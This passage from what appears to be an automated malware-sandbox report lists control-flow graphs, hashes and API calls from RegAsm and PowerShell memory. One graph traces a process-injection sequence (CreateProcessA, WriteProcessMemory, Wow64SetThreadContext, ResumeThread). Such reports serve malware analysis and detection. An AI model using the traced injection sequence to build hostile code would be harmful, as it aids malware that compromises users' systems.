                                                              control_flow_graph 1221 d254d8-d254e6 1222 d254e8-d25510 KiUserExceptionDispatcher 1221->1222 1223 d25518-d25522 1222->1223 1225 d25525-d2552b 1223->1225 1226 d25531-d25534 1225->1226 1227 d2561a-d2562b 1225->1227 1228 d25536-d2554d call d23d30 1226->1228 1233 d25555-d25562 1228->1233 1234 d25564-d25566 1233->1234 1235 d255a9-d255ac 1233->1235 1237 d2556e-d25575 1234->1237 1235->1227 1236 d255ae-d255b4 1235->1236 1236->1228 1238 d255b6-d255bd 1236->1238 1241 d255a6 1237->1241 1242 d25577-d2559e 1237->1242 1239 d2560b-d25615 1238->1239 1240 d255bf-d255d6 1238->1240 1239->1225 1240->1227 1246 d255d8-d255e2 1240->1246 1241->1235 1242->1241 1247 d255e4-d255e9 1246->1247 1248 d255fd-d25603 1246->1248 1247->1227 1250 d255eb-d255f5 1247->1250 1248->1239 1250->1248
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 00D2550A
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 8bb7915fb8f13619c44a926979e4296709cf14976d6d3a9927442e6dc0d0277c
                                                              • Instruction ID: e32b3f1c99456e87c9e428868301d6d0e161468cd6ef6a966d05e36f81595528
                                                              • Opcode Fuzzy Hash: 8bb7915fb8f13619c44a926979e4296709cf14976d6d3a9927442e6dc0d0277c
                                                              • Instruction Fuzzy Hash: BC317331A102159FCB04DF38E594AADBBF6EF98301B188165D809DB36ADB35DD46CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1254 d254e8-d25522 KiUserExceptionDispatcher 1257 d25525-d2552b 1254->1257 1258 d25531-d25534 1257->1258 1259 d2561a-d2562b 1257->1259 1260 d25536-d25562 call d23d30 1258->1260 1266 d25564-d25566 1260->1266 1267 d255a9-d255ac 1260->1267 1269 d2556e-d25575 1266->1269 1267->1259 1268 d255ae-d255b4 1267->1268 1268->1260 1270 d255b6-d255bd 1268->1270 1273 d255a6 1269->1273 1274 d25577-d2559e 1269->1274 1271 d2560b-d25615 1270->1271 1272 d255bf-d255d6 1270->1272 1271->1257 1272->1259 1278 d255d8-d255e2 1272->1278 1273->1267 1274->1273 1279 d255e4-d255e9 1278->1279 1280 d255fd-d25603 1278->1280 1279->1259 1282 d255eb-d255f5 1279->1282 1280->1271 1282->1280
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 00D2550A
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: b4bb816bf0cc10803e288e98bdabf3b1eda42320e0177dd6a5e6af0aebc19f64
                                                              • Instruction ID: 2005db7eb3a0b56e4e4376f8df57079dc9f8c2a83087894908561463e8932df8
                                                              • Opcode Fuzzy Hash: b4bb816bf0cc10803e288e98bdabf3b1eda42320e0177dd6a5e6af0aebc19f64
                                                              • Instruction Fuzzy Hash: 33318031A002158FCB04DF68E9949ADBBF6EF98305B188165D409DB36ADB35DD45CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1286 5ea1faf-5ea1fcc 1287 5ea1fd2-5ea1fd9 1286->1287 1288 5ea2126-5ea212e 1286->1288 1289 5ea1fdf-5ea2051 KiUserCallbackDispatcher 1287->1289 1290 5ea20d3-5ea20f3 call 5ea1e68 1287->1290 1305 5ea2057-5ea2059 1289->1305 1298 5ea20fe-5ea211e 1290->1298 1298->1288 1306 5ea205b-5ea208e 1305->1306 1307 5ea2090-5ea20d1 1305->1307 1306->1298 1307->1298
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000000,038942CC,028B514C), ref: 05EA2047
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 2638ced05b0e3e88ada5f6a6b03b9c6081c62b991a982ba610ebb2a2e746ca69
                                                              • Instruction ID: 3a807315d542547d39862b25f54fdd5cef33491a8702550ad6beb6da9de1d2d4
                                                              • Opcode Fuzzy Hash: 2638ced05b0e3e88ada5f6a6b03b9c6081c62b991a982ba610ebb2a2e746ca69
                                                              • Instruction Fuzzy Hash: 5131BA356402008FC309EB68E895E597BF2FF85708B4884ADE046CF266CB76ED06CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1317 5ea9cc0-5ea9cc6 1319 5ea9cc7-5ea9cca 1317->1319 1320 5ea9ccc-5ea9cce 1319->1320 1321 5ea9cd1-5ea9cd8 1319->1321 1320->1321 1322 5ea9cda 1321->1322 1323 5ea9cb6-5ea9cb7 1321->1323 1325 5ea9cdc-5ea9cde 1322->1325 1326 5ea9ce1-5ea9ce8 1322->1326 1324 5eab640-5eab6b0 PostMessageW 1323->1324 1328 5eab6b9-5eab6cd 1324->1328 1329 5eab6b2-5eab6b8 1324->1329 1325->1326 1326->1319 1327 5ea9cea 1326->1327 1330 5ea9cec 1327->1330 1331 5ea9cf1-5ea9cf3 1327->1331 1329->1328 1330->1331 1331->1324
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6070521b9bde4566b71c8a5f9311ecec9da428315b8aba68ba85fa7ebbd7d31b
                                                              • Instruction ID: 57147fafa41deca06635fd28510c9f031946c92348603228c3220f983d41a7c1
                                                              • Opcode Fuzzy Hash: 6070521b9bde4566b71c8a5f9311ecec9da428315b8aba68ba85fa7ebbd7d31b
                                                              • Instruction Fuzzy Hash: 5721A2718083889FDB01DF69C8906DFBFF8EF49314F14409AD594AB252D278A944CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1333 d286f8-d2879a DuplicateHandle 1334 d287a3-d287c0 1333->1334 1335 d2879c-d287a2 1333->1335 1335->1334
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D28787
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 5f3f9fb987ef45b45ec9126383d8ec976dac1f1158230c8ea3f2c9649950578e
                                                              • Instruction ID: 0cc6c3e64e89f28bc7947866b08a549073fb5e03b6330d94d5a422f8265bec07
                                                              • Opcode Fuzzy Hash: 5f3f9fb987ef45b45ec9126383d8ec976dac1f1158230c8ea3f2c9649950578e
                                                              • Instruction Fuzzy Hash: 6B21F6B5D012099FDB10CFAAD984ADEFBF5EB48314F14841AE914A3310D778A955CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1338 d28700-d2879a DuplicateHandle 1339 d287a3-d287c0 1338->1339 1340 d2879c-d287a2 1338->1340 1340->1339
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D28787
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 298ba3090d65d1c0b4f425e331282ea1ab08739422898e915e8eb2af15bbcac8
                                                              • Instruction ID: 61b5c2ea5e67239a98f9cc0695a5e185d6722b16d9b9656b115e38e3afc623e1
                                                              • Opcode Fuzzy Hash: 298ba3090d65d1c0b4f425e331282ea1ab08739422898e915e8eb2af15bbcac8
                                                              • Instruction Fuzzy Hash: 2A21F4B5D002089FDB10CF9AD984ADEBBF4EB48314F14841AE914A3310C778A944CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1343 d2e284-d2f5a8 1345 d2f5b0-d2f5e1 GetModuleHandleW 1343->1345 1346 d2f5aa-d2f5ad 1343->1346 1347 d2f5e3-d2f5e9 1345->1347 1348 d2f5ea-d2f5fe 1345->1348 1346->1345 1347->1348
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,00D2F394), ref: 00D2F5CE
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: b2b89fd324b945b835b67bcd111295b242a81ead07d608a45086583d0f886bd1
                                                              • Instruction ID: 69e263c33aaf624a3248c99150a358c0c824c220f263f7c8ab9e1eeb0a2fe11f
                                                              • Opcode Fuzzy Hash: b2b89fd324b945b835b67bcd111295b242a81ead07d608a45086583d0f886bd1
                                                              • Instruction Fuzzy Hash: 911100B5C002598BCB10CF9AD444A9EFBF4EF48314F14846AD929A7300D379A945CFA1
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05EAB69D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 7216ef36ad001a14f865302f17a2fd5a06ee7f35c95c449fb567a4c3c1f98c75
                                                              • Instruction ID: 38085dbfb2bda656718a32cf07d49a4ec251f85af89ff5545e6164ca511bf7d5
                                                              • Opcode Fuzzy Hash: 7216ef36ad001a14f865302f17a2fd5a06ee7f35c95c449fb567a4c3c1f98c75
                                                              • Instruction Fuzzy Hash: F21126B58043498FDB10CFA9C944BEEBBF8EB88314F10845AD558AB241D375A544CFA1
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05EAB69D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: ff4b4def1da3eeb56e381f3d7d6696989017d06ff0ca0602b522d6ab4816fc68
                                                              • Instruction ID: f9b35dff5eb21a6770b55efb4fdbed38603c712082921b362119086468a1deb8
                                                              • Opcode Fuzzy Hash: ff4b4def1da3eeb56e381f3d7d6696989017d06ff0ca0602b522d6ab4816fc68
                                                              • Instruction Fuzzy Hash: B81102B58003499FDB10DF9AC945BEEBBF8FB88314F10845AE958A7340D378A944CFA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DispatchMessage
                                                              • String ID:
                                                              • API String ID: 2061451462-0
                                                              • Opcode ID: 7a3f329439935c6b8ecc6ea1b08608ffacc10560483f0d17db3b8f5266ed2b27
                                                              • Instruction ID: ae2cb6c8d40fed35d1dcc183e250c43e7a4ef8335adf29b6ac4f9025a5e39be8
                                                              • Opcode Fuzzy Hash: 7a3f329439935c6b8ecc6ea1b08608ffacc10560483f0d17db3b8f5266ed2b27
                                                              • Instruction Fuzzy Hash: 0911E0B5C046498FDB10DF9AD944ADEFBF4EB48314F10846AD959B7300D378A544CFA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DispatchMessage
                                                              • String ID:
                                                              • API String ID: 2061451462-0
                                                              • Opcode ID: 77cfaceffff8dd6976771989c1638a1480f9fd6fbf5aa26b1d4f7e3cbe1c141e
                                                              • Instruction ID: 1f443c23537c068c035e2754d45faef749c30da15243e5c12d80f490174b35cc
                                                              • Opcode Fuzzy Hash: 77cfaceffff8dd6976771989c1638a1480f9fd6fbf5aa26b1d4f7e3cbe1c141e
                                                              • Instruction Fuzzy Hash: F811FDB6C006498FCB10CFAAD544ADEBBF4AB48214F20846AD468B7200D338A944CFA5
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05EAB69D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: ddbe471af3a5402bb958ed80650c60a7a2bd883d4e41f2020bcaede37f6e1fbb
                                                              • Instruction ID: b216f2d07eacebe04c38c1250fc8cc83a98455241c9ee634faaedbe873b16980
                                                              • Opcode Fuzzy Hash: ddbe471af3a5402bb958ed80650c60a7a2bd883d4e41f2020bcaede37f6e1fbb
                                                              • Instruction Fuzzy Hash: CB11E0B6800249CFDB10CF99C985BEEBBF8FB48314F20885AD958A7340C378A544CFA1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2983403402.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_bcd000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bbb3bc6a42e1bc7ea14b600702d5a85c64dc613a94f050835df64b17c3e0af0
                                                              • Instruction ID: 0776e7fd9bb51a439670a155e8b41e0b55f7f1cafb780b1e131642ac1e399f86
                                                              • Opcode Fuzzy Hash: 3bbb3bc6a42e1bc7ea14b600702d5a85c64dc613a94f050835df64b17c3e0af0
                                                              • Instruction Fuzzy Hash: 302121B9504240DFCB05DF14C9C0F26BFA5EB98314F2085BDD8090B256C33AD846DBA2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78850c5a953ba5a5baf99c77b1f91f090e3c3c80570d2ad62e05b2976a8a8e44
                                                              • Instruction ID: 43dbbb4c7db7ae5244466d544113edf432d1ce28506d20cbf9087833fc1ecd00
                                                              • Opcode Fuzzy Hash: 78850c5a953ba5a5baf99c77b1f91f090e3c3c80570d2ad62e05b2976a8a8e44
                                                              • Instruction Fuzzy Hash: 3A210071604200DFCB14DF24D9D0B26FBA5EB88314F24C5AAD8894B356D33AD806CAA1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c230ad6c851619e171b823cb1b90c3a8bacb4b79963fdaecdcee92662bd6eed
                                                              • Instruction ID: 8955ce30842ee8a3e616034d625324f13ec060bf030c72898a4520b929e92983
                                                              • Opcode Fuzzy Hash: 5c230ad6c851619e171b823cb1b90c3a8bacb4b79963fdaecdcee92662bd6eed
                                                              • Instruction Fuzzy Hash: 38210475604604DFCB04CF24D9C0B26FBA5FB84324F24C9AED8894B352D33AD846CA66
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ad11c80620dcdbe1f7bfc16377a61aa3affeab1ae3e08e91aa6c5fc096f0dba
                                                              • Instruction ID: 2d1a58319c1de650c903bb3575fba887444aa5610a9b951e1ceefebd83974ee9
                                                              • Opcode Fuzzy Hash: 0ad11c80620dcdbe1f7bfc16377a61aa3affeab1ae3e08e91aa6c5fc096f0dba
                                                              • Instruction Fuzzy Hash: D2213871504244EFDB05DF14D9C0B26FFA5FB84324F24C5AAD9896B345D33AD846C7A1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9734bb6e7b903406f64cecf58d82b5c51c4d3a3f9a7ec63a1a2e687b996ccc5
                                                              • Instruction ID: 622e19ef6e8bc96def98cf70c5a1910d2e5e00ca608f41fcbb226519a4e08071
                                                              • Opcode Fuzzy Hash: e9734bb6e7b903406f64cecf58d82b5c51c4d3a3f9a7ec63a1a2e687b996ccc5
                                                              • Instruction Fuzzy Hash: 6F2180755093808FCB12CF24D9A4715BFB1EB86314F28C5DBD8898B657C33A980ACB62
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2983403402.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_bcd000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                                              • Instruction ID: 3c25472f38d8be2d9b2eb7823883bfc07ebfdf825e98dc5f27bb8e63285f6200
                                                              • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                                              • Instruction Fuzzy Hash: 4F11AF76504280DFCB16CF10D9C4B16BFA1FB94324F24C6ADD9094B616C336D85ADBA2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a385c70c6df2fea437dd9638ab4733651be955a019863ca77dc41e91d8421b4c
                                                              • Instruction ID: 48c28ff992bdc6741b224affb219157753366f4faae54d0d6230487af0ee950c
                                                              • Opcode Fuzzy Hash: a385c70c6df2fea437dd9638ab4733651be955a019863ca77dc41e91d8421b4c
                                                              • Instruction Fuzzy Hash: 2111B275504284CFDB12CF14D9C4B15FFA1FB84324F24C6AAD8495B746C33AD84ACBA2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
                                                              • Instruction ID: ad0cdc51d4950015be1274afc1573bbcea60ba7ff83a1d22b95fda1ba0358ce3
                                                              • Opcode Fuzzy Hash: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
                                                              • Instruction Fuzzy Hash: BD119D75504680DFDB06CF14D5C4B15FFA1FB84328F28C6AAD8894B756C33AD84ACBA2
                                                              APIs
                                                              • GetKeyState.USER32(00000010), ref: 00D25F8C
                                                              • GetKeyState.USER32(00000011), ref: 00D25FD1
                                                              • GetKeyState.USER32(00000012), ref: 00D26016
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: State
                                                              • String ID:
                                                              • API String ID: 1649606143-0
                                                              • Opcode ID: 64c749c31f604b00b516506d0702184da27c3fc0cef34b742798e12699c0f954
                                                              • Instruction ID: ce3585720b3771b07590e19ccdeb0509f687c36e9b26ce1b828ab91a8516b937
                                                              • Opcode Fuzzy Hash: 64c749c31f604b00b516506d0702184da27c3fc0cef34b742798e12699c0f954
                                                              • Instruction Fuzzy Hash: BA31C0B08057598EDB20CF99E5487EEBFF4EF54308F208049D648A7251C3B99685CFE1
                                                              APIs
                                                              • GetKeyState.USER32(00000010), ref: 00D25F8C
                                                              • GetKeyState.USER32(00000011), ref: 00D25FD1
                                                              • GetKeyState.USER32(00000012), ref: 00D26016
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: State
                                                              • String ID:
                                                              • API String ID: 1649606143-0
                                                              • Opcode ID: fa76b5ec5107e73058fafeb227ee0483ee8aaef54601cbdd26b724eb2b4c7616
                                                              • Instruction ID: 6dbe73b0473c7dae049a35252d93c1103155a63b91f2bd6181d6018cd2294047
                                                              • Opcode Fuzzy Hash: fa76b5ec5107e73058fafeb227ee0483ee8aaef54601cbdd26b724eb2b4c7616
                                                              • Instruction Fuzzy Hash: 66319C708047598EDB20DF9AE908BEFBFF4EF54708F208459D648A7350C7B99684CBA1

                                                              Execution Graph

                                                              Execution Coverage:6.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:16
                                                              Total number of Limit Nodes:2
                                                              execution_graph 2761 7ff848c564dd 2762 7ff848c564eb ResumeThread 2761->2762 2764 7ff848c565a6 2762->2764 2765 7ff848c565d8 2767 7ff848c565e1 2765->2767 2766 7ff848c565cc 2767->2766 2768 7ff848c56673 Wow64SetThreadContext 2767->2768 2769 7ff848c566a4 2768->2769 2770 7ff848c50cfa 2771 7ff848c50d0d CreateProcessA 2770->2771 2773 7ff848c572ef 2771->2773 2774 7ff848c567e4 2776 7ff848c567ed 2774->2776 2775 7ff848c567dc 2776->2775 2777 7ff848c568a5 WriteProcessMemory 2776->2777 2778 7ff848c568e6 2777->2778

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2679255921.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ff848c50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a16d01710524f82584f8a0419b9dc9a4239e298c3199a67a2ecea9af9f40fe2
                                                              • Instruction ID: c99c9580d4525a762501360e68d86d328fa9a1d21c5f5f14ddde2b2a249ed98f
                                                              • Opcode Fuzzy Hash: 1a16d01710524f82584f8a0419b9dc9a4239e298c3199a67a2ecea9af9f40fe2
                                                              • Instruction Fuzzy Hash: 37D1A530518A8D8FDFA8EF18D8567E977E1FB68310F10422AD84DC7291DF74A9818B86

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2679255921.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ff848c50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: e8b31f45fa402ac60513a81d9105973331244b8cf077258fb2f6556e6cbfc8ca
                                                              • Instruction ID: 44c1ca9ffdecc030d7cbc33e1064fccc6eee3fcece877ac72f78d6d15cd3fe4b
                                                              • Opcode Fuzzy Hash: e8b31f45fa402ac60513a81d9105973331244b8cf077258fb2f6556e6cbfc8ca
                                                              • Instruction Fuzzy Hash: 61411731D0CB1C4FDB18EB9898466FDBBE0EB95350F00426FE449D3252DB74A845C795

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2679255921.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ff848c50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 5fb8c73fa8ea718e29739a2ba1d4c5333fd6cbe813dc8f8c54c5ced98c35a7b4
                                                              • Instruction ID: 24e329dc39886240ee5a888085ddc9d5eab7cae03c640c7ba2963b9828ff7bc0
                                                              • Opcode Fuzzy Hash: 5fb8c73fa8ea718e29739a2ba1d4c5333fd6cbe813dc8f8c54c5ced98c35a7b4
                                                              • Instruction Fuzzy Hash: AE312A31D0CB584FDB28EBA898466F9BBE0EF55361F04023FD04AD3282DF7564068795

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2679255921.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ff848c50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 9b76f1e1d85a9545c16f4d9ca58307321b8c16c0808babfef98f30685bdfc500
                                                              • Instruction ID: 0d62ba015294f990c42aaa81d83d3bfbac9b6819d7cdfb8171aafab81fed317c
                                                              • Opcode Fuzzy Hash: 9b76f1e1d85a9545c16f4d9ca58307321b8c16c0808babfef98f30685bdfc500
                                                              • Instruction Fuzzy Hash: 3931393090D7884FDB5ADB6888566E9BFE0EF56320F0842AFD089C7197DB789406C751

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 162 7ff848d20ade-7ff848d20af4 163 7ff848d20b0d-7ff848d20b12 162->163 164 7ff848d20af6-7ff848d20b03 162->164 166 7ff848d20b18-7ff848d20b1b 163->166 167 7ff848d20baa-7ff848d20bb4 163->167 164->163 168 7ff848d20b05-7ff848d20b0b 164->168 166->167 169 7ff848d20b21-7ff848d20b24 166->169 170 7ff848d20bc3-7ff848d20c06 167->170 171 7ff848d20bb6-7ff848d20bc2 167->171 168->163 173 7ff848d20b4b 169->173 174 7ff848d20b26-7ff848d20b49 169->174 176 7ff848d20b4d-7ff848d20b4f 173->176 174->176 176->167 177 7ff848d20b51-7ff848d20b5b 176->177 177->167 183 7ff848d20b5d-7ff848d20b73 177->183 185 7ff848d20b7a-7ff848d20b83 183->185 186 7ff848d20b9c-7ff848d20ba9 185->186 187 7ff848d20b85-7ff848d20b92 185->187 187->186 189 7ff848d20b94-7ff848d20b9a 187->189 189->186
                                                              Strings
                                                              Memory Dump Source
